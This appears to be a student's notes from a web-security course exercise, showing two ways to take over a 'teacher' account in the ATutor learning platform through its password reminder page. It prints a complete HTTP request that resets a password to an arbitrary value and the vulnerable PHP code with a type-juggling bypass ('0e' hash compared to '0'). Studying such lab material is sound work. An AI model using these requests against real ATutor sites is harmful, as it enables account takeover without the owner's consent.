5.5.2
Given everything you have learned about type juggling, recreate the compromise of the “teacher” account using the “Forgot Password” function WITHOUT updating the email address.
Solution 1
- Password modification to any arbitrary password for user
- This is a logic bug as it does not
exitfrom the code after failure - This is not a type juggling bug however.
POST /ATutor/password_reminder.php HTTP/1.1
Host: 192.168.184.103
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://192.168.184.103
Connection: close
Referer: http://192.168.184.103/ATutor/password_reminder.php
Cookie: ATutorID=a6db961helpugidlkpnpm29dp4; flash=no; _ga=GA1.1.1101142951.1656417992; _gid=GA1.1.1314454257.1656417992; m_Networking=null; m_Content Navigation=null; m_Related Topics=null; m_Users Online=null; m_Glossary=null; m_Search=null; m_Polls=null; m_Forum Posts=null; side-menu=; showSubNav_i=on; _gat=1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
g=100000000000&id=1&form_change=true&h=&form_password_hidden=noob
Solution 2
- Type Juggling brute force to enter the
elseclause
$hash = sha1($_REQUEST['id'] + $_REQUEST['g'] + $row['password']);
$hash_bit = substr($hash, 5, 15);
# Compare hash_bit with 'h' value that we control --> set to '0'
if ($_REQUEST['h'] != $hash_bit) {
$msg->addError('INVALID_LINK');
$savant->display('password_reminder_feedback.tmpl.php');
} else if (($_REQUEST['h'] == $hash_bit) && !isset($_POST['form_change'])) {
$hash_bit = '0e1111111';
$h = '0';
print $hash_bit;
print $h;
if ($hash_bit == $h) {
print "True";
}